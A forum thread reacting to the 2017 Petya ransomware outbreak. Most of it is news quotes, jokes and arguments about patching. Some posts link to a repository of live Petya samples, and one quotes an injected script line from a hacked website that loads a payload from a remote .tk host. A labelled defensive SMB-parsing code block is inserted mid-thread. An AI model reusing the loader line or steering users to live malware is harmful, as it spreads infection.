BREAKING: Multiple cyberattacks reported worldwide

  • 27-06-2017 4:03pm
    #1
    Site Banned Posts: 1


    BBC News wrote:
    A "powerful" ransomware cyberattack that started in Ukraine is rapidly spreading across the world and causing chaos, hitting banks, government IT systems and energy firms.

    British advertising group WPP said its computer networks in several locations had been targeted.

    The UK's National Cyber Security Centre is investigating how many more UK firms have been hit and is "trying to get an understanding of a fast-moving situation".

    Companies in six other countries were also hit, after Ukraine declared it had been struck by the biggest cyberattack in its history.

    The virus has been identified as 'Petrwrap', a modified version of the WannaCry ransomware that hit the NHS and other companies in May.

    Maersk Line said that all its computer systems in the UK and Ireland were down.

    There are as yet unconfirmed reports that some Irish computers have also been hit.

    What are your thoughts on all this?

    Folks, just a warning, stay safe online. You could be hit by this new ransomware attack. Beware.



Comments

  • Closed Accounts Posts: 8,555 ✭✭✭Roger Hassenforder


    FFS Vlad, cop on


  • Registered Users, Registered Users 2 Posts: 4,785 ✭✭✭KungPao


    For more information and tips on how to prevent this attack, just click here >> http://bit.ly/2tS9scV


  • Registered Users, Registered Users 2 Posts: 84,763 ✭✭✭✭Atlantic Dawn


    Is it the usual where gobsheites who are still running Windows XP or have not updated security patches for months are hit?


  • Registered Users, Registered Users 2 Posts: 28,789 ✭✭✭✭ScumLord


    We need to bomb that cyberstan back to the stone age.


  • Registered Users, Registered Users 2 Posts: 38,247 ✭✭✭✭Guy:Incognito


    stepladder wrote: »

    What are your thoughts on all this?

    That the people who do these things are ****ing arseholes and no better than any other criminals.


  • Moderators, Category Moderators, Science, Health & Environment Moderators Posts: 9,338 CMod ✭✭✭✭Fathom


    Run virtual OS. Stay updated. Hide behind DMZ. Life's game play. Have fun!


  • Registered Users, Registered Users 2 Posts: 43,028 ✭✭✭✭SEPT 23 1989


    I presume the virus has spread to the ships and they are now out of control heading for the major coastal cities of the world


  • Registered Users, Registered Users 2 Posts: 2,690 ✭✭✭ElChe32


    Friend of mine in Madrid works for a company that was hit big time by the attack today. She's delighted she got let home early.


  • Closed Accounts Posts: 6,869 ✭✭✭PeterTheNinth


    Is it the usual where gobsheites who are still running Windows XP or have not updated security patches for months are hit?

    You sure about that AD. I'm worried about somebody clicking something in one of our customers. Wondering if we should pull the sites offline altogether.


  • Registered Users, Registered Users 2 Posts: 28,633 ✭✭✭✭murpho999


    Nothing wrong with my compu


  • Registered Users, Registered Users 2 Posts: 37,316 ✭✭✭✭the_syco


    KungPao wrote: »
    For more information and tips on how to prevent this attack, just click here >> http://bit.ly/2tS9scV
    Do you have the direct link? Not clicking random bit.ly link on a thread about ransomware!


  • Posts: 24,714 ✭✭✭✭ [Deleted User]


    Is it the usual where gobsheites who are still running Windows XP or have not updated security patches for months are hit?

    In fairness many people have no option but to run XP, we have equipment in work that will only run with XP as there is no software compatible with anything newer so we have to keep some machines running XP.


  • Posts: 17,378 ✭✭✭✭ [Deleted User]


    Is it the usual where gobsheites who are still running Windows XP or have not updated security patches for months are hit?

    These are exploits developed by the US government we're dealing with here. There are definitely things that will get a fully updated machine.


  • Closed Accounts Posts: 6,869 ✭✭✭PeterTheNinth


    My radio was taken over by ransomware a few years ago. Ryan Tubridy 1Million Euro in BitCoin, Joe Duffy 400K in Bit Coin, Marion Finucane 500K in BitCoin.


  • Posts: 0 [Deleted User]


    I presume the virus has spread to the ships and they are now out of control heading for the major coastal cities of the world

    Roland Emmerich already sweating over the rights


  • Registered Users, Registered Users 2 Posts: 11,690 ✭✭✭✭Skylinehead


    In fairness many people have no option but to run XP, we have equipment in work that will only run with XP as there is no software compatible with anything newer so we have to keep some machines running XP.

    Then your equipment needs updating. XP is an outdated, insecure, unsupported OS and if your business gets attacked as a result, can't blame anyone else!


  • Registered Users, Registered Users 2 Posts: 9,605 ✭✭✭gctest50


    the_syco wrote: »
    Do you have the direct link? Not clicking random bit.ly link on a thread about ransomware!


    based on petya no ?

    obviously don't put click "run" - passworded anyways

    https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.Petya




    Please remember that these are live and dangerous malware! They come encrypted and locked for a reason! Do NOT run them unless you are absolutely sure of what you are doing! They are to be used only for educational purposes (and we mean that!) !!!

    We recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with vicious and dangerous malware!!!


    .


  • Registered Users, Registered Users 2 Posts: 532 ✭✭✭Arbitrary


    the_syco wrote: »
    Do you have the direct link? Not clicking random bit.ly link on a thread about ransomware!

    http://redirectdetective.com/


  • Registered Users, Registered Users 2 Posts: 465 ✭✭Meeeee79


    the_syco wrote: »
    Do you have the direct link? Not clicking random bit.ly link on a thread about ransomware!

    I think the irony has been lost on you here...........


  • Registered Users, Registered Users 2 Posts: 36,909 ✭✭✭✭BorneTobyWilde


    I found a signal hidden inside our own satellite system, and the clock is ticking.

    independence_day_powerbook_5300_1.jpg


  • Posts: 24,714 ✭✭✭✭ [Deleted User]


    Then your equipment needs updating. XP is an outdated, insecure, unsupported OS and if your business gets attacked as a result, can't blame anyone else!

    It's custom equipment that in some cases cannot be replaced or updated (company closed down for example), where the company don't offer updates or it would cost vast amounts of money to update.

    Some stuff is so custom there is simply no way to update it no matter how much you wanted to.


  • Registered Users, Registered Users 2 Posts: 4,785 ✭✭✭KungPao


    gctest50 wrote: »
    based on petya no ?

    obviously don't put click "run" - passworded anyways

    https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.Petya




    Please remember that these are live and dangerous malware! They come encrypted and locked for a reason! Do NOT run them unless you are absolutely sure of what you are doing! They are to be used only for educational purposes (and we mean that!) !!!

    We recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with vicious and dangerous malware!!!


    .
    i-aint-clicking-that.jpg


  • Registered Users, Registered Users 2 Posts: 11,749 ✭✭✭✭wes


    Well, that explains why the lads in the office were talking about cyber attacks earlier. Was busy finishing off some performance scripts.

    I guess these things will start getting more and more common. Will take a look at Krebs on Security, as he is good for a little more technical info, when he gets around to covering this.

    **EDIT**
    Read on the UK Independent that this is due to an SMB vulnerability. Surely not the same one as last time? If that is the case, then some seriously stupid companies out there for not fixing it, after the last time.
    UK National Cyber Security Centre says it is 'aware of global ransomware incident'

    --SNIP--
    The Swiss government’s Reporting and Analysis Centre said the Petya virus was believed to be responsible and was spreading by “exploiting the SMB (Server Message Block) vulnerability”.
    --SNIP--


  • Registered Users, Registered Users 2 Posts: 5,673 ✭✭✭AudreyHepburn


    I'm entirely surprised tbh....these guys are always one step ahead.

    That they could infiltrate Chernobyl's radiation monitoring equipment is scary though.


  • Posts: 17,378 ✭✭✭✭ [Deleted User]


    I'm entirely surprised tbh....these guys are always one step ahead.

    That they could infiltrate Chernobyl's radiation monitoring equipment is scary though.

    It's US government code that was leaked and has been adapted.


  • Registered Users, Registered Users 2 Posts: 9,166 ✭✭✭Fr_Dougal


    gctest50 wrote: »
    based on petya no ?

    obviously don't put click "run" - passworded anyways

    https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.Petya




    Please remember that these are live and dangerous malware! They come encrypted and locked for a reason! Do NOT run them unless you are absolutely sure of what you are doing! They are to be used only for educational purposes (and we mean that!) !!!

    We recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with vicious and dangerous malware!!!


    .

    father-dougal-presses-the-button.gif


  • Closed Accounts Posts: 870 ✭✭✭scopper


    To be fair the money in ransomware means someone was going to try again. By the end of the year this will be so normal it won't make the news.


  • Registered Users, Registered Users 2 Posts: 9,605 ✭✭✭gctest50


    It's US government code that was leaked and has been adapted.


    To encrypt your stuff the older one uses :

    https://en.wikipedia.org/wiki/Salsa20

    by :

    Daniel Julius Bernstein , Bernstein addressed cryptography by suing the United States Government in 1995 Bernstein v. United States and by writing secure software for email, web, and DNS


  • Registered Users, Registered Users 2 Posts: 19,739 ✭✭✭✭Ol' Donie


    It better not be that thing that wrecked boards for a few days again.

    That was rubbish.


  • Registered Users, Registered Users 2 Posts: 36,170 ✭✭✭✭ED E


    It's custom equipment that in some cases cannot be replaced or updated (company closed down for example), where the company don't offer updates or it would cost vast amounts of money to update.

    Some stuff is so custom there is simply no way to update it no matter how much you wanted to.


    That's why you airgap it. Then worms aren't a problem.


    wes wrote: »
    Well, that explains why the lads in the office were talking about cyber attacks earlier. Was busy finishing off some performance scripts.

    I guess these things will start getting more and more common. Will take a look at Krebs on Security, as he is good for a little more technical info, when he gets around to covering this.

    **EDIT**
    Read on the UK Independent that this is due to an SMB vulnerability. Surely not the same one as last time? If that is the case, then some seriously stupid companies out there for not fixing it, after the last time.

    Downgrade attacks are the problem. SMB v2/3 have significantly better security but you can trick any machine into falling back to v1 which is horribly out of date. MS have to kill support for it but haven't yet as it's gonna break a load of old machines.
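
A defensive check related to the SMBv1 fallback point in the post above, as an added example (not code from the thread or any poster): it parses SMB NEGOTIATE requests and reports which clients still offer only SMB1 dialects, which are the machines that would break if SMBv1 were switched off. The function names are hypothetical and the three sample messages are constructed for the example.

```python
import struct

SMB1_MAGIC, SMB2_MAGIC = b"\xffSMB", b"\xfeSMB"
SMB2_NAMES = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0",
              0x0302: "3.0.2", 0x0311: "3.1.1"}

def offered_dialects(msg):
    """Dialects offered by an SMB NEGOTIATE request (transport header stripped)."""
    if msg[:4] == SMB1_MAGIC:
        # 32-byte SMB1 header; command byte 0x72 is SMB_COM_NEGOTIATE
        if len(msg) < 35 or msg[4] != 0x72:
            raise ValueError("not an SMB1 NEGOTIATE request")
        off = 33 + 2 * msg[32]          # skip WordCount and its parameter words
        if len(msg) < off + 2:
            raise ValueError("truncated SMB1 NEGOTIATE")
        (byte_count,) = struct.unpack_from("<H", msg, off)
        data = msg[off + 2:off + 2 + byte_count]
        if len(data) != byte_count:
            raise ValueError("truncated dialect list")
        # each entry: 0x02 marker, ASCII dialect name, NUL terminator
        return [e[1:].decode("ascii", "replace")
                for e in data.split(b"\x00") if e[:1] == b"\x02"]
    if msg[:4] == SMB2_MAGIC:
        # 64-byte SMB2 header (Command at offset 12), then a 36-byte
        # NEGOTIATE body with DialectCount at +2; dialect codes follow.
        if len(msg) < 100 or struct.unpack_from("<H", msg, 12)[0] != 0:
            raise ValueError("not an SMB2 NEGOTIATE request")
        (count,) = struct.unpack_from("<H", msg, 66)
        if len(msg) < 100 + 2 * count:
            raise ValueError("truncated dialect list")
        codes = struct.unpack_from("<%dH" % count, msg, 100)
        return [SMB2_NAMES.get(c, hex(c)) for c in codes]
    raise ValueError("not an SMB message")

def classify(msg):
    """'smb1-only', 'multi-protocol' (SMB1 framing that also offers SMB2) or 'smb2+'."""
    dialects = offered_dialects(msg)
    if msg[:4] == SMB2_MAGIC:
        return "smb2+"
    if any(d.startswith("SMB 2") for d in dialects):
        return "multi-protocol"
    return "smb1-only"

# --- constructed sample messages (not captured traffic) ---
def _smb1_negotiate(names):
    body = b"".join(b"\x02" + n.encode("ascii") + b"\x00" for n in names)
    return (SMB1_MAGIC + b"\x72" + bytes(27) + b"\x00"
            + struct.pack("<H", len(body)) + body)

def _smb2_negotiate(codes):
    header = SMB2_MAGIC + struct.pack("<H", 64) + bytes(58)  # Command 0 = NEGOTIATE
    body = struct.pack("<HH", 36, len(codes)) + bytes(32)
    return header + body + struct.pack("<%dH" % len(codes), *codes)

LEGACY = _smb1_negotiate(["PC NETWORK PROGRAM 1.0", "LANMAN1.0", "NT LM 0.12"])
MULTI = _smb1_negotiate(["NT LM 0.12", "SMB 2.002", "SMB 2.???"])
MODERN = _smb2_negotiate([0x0202, 0x0210, 0x0300, 0x0302, 0x0311])

if __name__ == "__main__":
    for name, msg in (("legacy", LEGACY), ("multi", MULTI), ("modern", MODERN)):
        print(name, classify(msg), offered_dialects(msg))
```

Hosts that show up as `smb1-only` are the ones to inventory before disabling SMBv1 on the servers they talk to.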


  • Posts: 17,378 ✭✭✭✭ [Deleted User]


    gctest50 wrote: »
    To encrypt your stuff the older one uses :

    https://en.wikipedia.org/wiki/Salsa20

    by :

    Daniel Julius Bernstein , Bernstein addressed cryptography by suing the United States Government in 1995 Bernstein v. United States and by writing secure software for email, web, and DNS
    I'm talking about the exploit to hack the systems in the first place. WannaCry was an NSA-exploit. Apparently, this one uses the same base as WannaCry.


  • Moderators, Category Moderators, Music Moderators, Politics Moderators, Society & Culture Moderators Posts: 22,360 CMod ✭✭✭✭Dravokivich


    I'm entirely surprised tbh....these guys are always one step ahead.

    That they could infiltrate Chernobyl's radiation monitoring equipment is scary though.

    "Infiltrate" is the wrong way to describe it. No specific organisations are being targeted.


  • Registered Users, Registered Users 2 Posts: 13,191 ✭✭✭✭sammyjo90


    It's hit the company I work for. Home early today and just been told that for now..there is no work tomorrow! Until I wake up to a text saying I have to come in that is :(


  • Closed Accounts Posts: 1,568 ✭✭✭BillyBobBS


    Eh it's pretty worrying they were able to get into a nuclear power station's systems.


  • Moderators, Music Moderators Posts: 35,945 Mod ✭✭✭✭dr.bollocko


    BillyBobBS wrote: »
    Eh it's pretty worrying they were able to get into a nuclear power station's systems.

    If this creates a disaster that kills us all I'm glad that it happened on a Tuesday. At least it won't **** up the weekend.


  • Registered Users, Registered Users 2 Posts: 8,034 ✭✭✭mad muffin


    I was driving when I heard something about it on the radio. All I got was something about Deutsche Post being hit, and I was like… NOOOOOOOO!!!!

    As only today I ordered something from Germany that's being delivered via Deutsche Post. I was like FML :mad:


    Quick google when I got home revealed it was only the express division of the Ukraine arm of DHL.

    PHEW :D

    Carry on :pac:


  • Registered Users, Registered Users 2 Posts: 1,062 ✭✭✭gw80


    Will this have an effect on my welder and my grinder in work tomorrow,? my welder is pretty fancy, its got lights and digital numbers en everything,


  • Registered Users, Registered Users 2 Posts: 9,166 ✭✭✭Fr_Dougal


    gw80 wrote: »
    Will this have an effect on my welder and my grinder in work tomorrow,? my welder is pretty fancy, its got lights and digital numbers en everything,

    Might do, you had better uninstall grinder, just to be safe.


  • Registered Users, Registered Users 2 Posts: 10,423 ✭✭✭✭Outlaw Pete


    Yeah I noticed earlier when I was typing tha........ Allāhu akbar!! Death to America!!


  • Closed Accounts Posts: 3,257 ✭✭✭Yourself isit


    gw80 wrote: »
    Will this have an effect on my welder and my grinder in work tomorrow,? my welder is pretty fancy, its got lights and digital numbers en everything,

    Not if you upgraded to iOS 12.1 XP linuxvista. Pm me if stuck.


  • Registered Users, Registered Users 2 Posts: 18,288 ✭✭✭✭RobbingBandit


    Password:0000 the four 0s are in a different order now that will fool them.


  • Posts: 24,714 ✭✭✭✭ [Deleted User]


    It's great having a Mac and not having to worry about all these Microsoft attacks.


  • Closed Accounts Posts: 2,988 ✭✭✭jacksie66


    This post has been deleted.


  • Registered Users, Registered Users 2 Posts: 9,166 ✭✭✭Fr_Dougal


    It's great having a Mac and not having to worry about all these Microsoft attacks.

    Macs aren't immune to cyberattacks. Safe from Windows based attacks alright.


  • Registered Users, Registered Users 2 Posts: 37,316 ✭✭✭✭the_syco


    It's great having a Mac and not having to worry about all these Microsoft attacks.
    Except from MacRansom; https://nakedsecurity.sophos.com/2017/06/15/more-mac-ransomware-666-and-7-days-to-pay/


  • Registered Users, Registered Users 2 Posts: 465 ✭✭Meeeee79


    mad muffin wrote: »
    I was driving when I heard something about it on the radio. All I got was something about Deutsche Post being hit, and I was like… NOOOOOOOO!!!!

    As only today I ordered something from Germany that's being delivered via Deutsche Post. I was like FML :mad:


    Quick google when I got home revealed it was only the express division of the Ukraine arm of DHL.

    PHEW :D

    Carry on :pac:

    I think the situation is a little more serious than the status of your delivery


  • Moderators, Arts Moderators Posts: 35,741 Mod ✭✭✭✭pickarooney


    Fathom wrote: »
    Run virtual OS. Stay updated. Hide behind DMZ. Life's game play. Have fun!

    Hide behind DMZ? How does that work?


  • Registered Users, Registered Users 2 Posts: 9,605 ✭✭✭gctest50


    I'm talking about the exploit to hack the systems in the first place. WannaCry was an NSA-exploit. Apparently, this one uses the same base as WannaCry.

    Maybe through hacked websites too

    this Ukrainian website
    ht***p://bahmut.com.ua

    has this buried in it :

    var REMOTE_URL = 'http://dfkiueswbgfreiwfsd.tk/i/'

    execute_request(traffic, REMOTE_URL, apply_payload);


    probably not free kitten pics ? dunno



    Reads the active computer name
    Reads the cryptographic machine GUID
    Parsed Javascript
    Reads Windows Trust Settings

    Opens the MountPointManager (often used to detect additional infection locations)

    Touches files in the Windows directory

    Found potential URL in binary/memory

    Reads information about supported languages


  • Registered Users, Registered Users 2 Posts: 9,605 ✭✭✭gctest50


    I'm talking about the exploit to hack the systems in the first place. WannaCry was an NSA-exploit. Apparently, this one uses the same base as WannaCry.

    Hacked update servers :



    https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/


    Delivery and installation


    Initial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc.

    Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process.






  • Registered Users, Registered Users 2 Posts: 8,034 ✭✭✭mad muffin


    Meeeee79 wrote: »
    I think the situation is a little more serious than the status of your delivery

    You may think it… but you would be wrong.

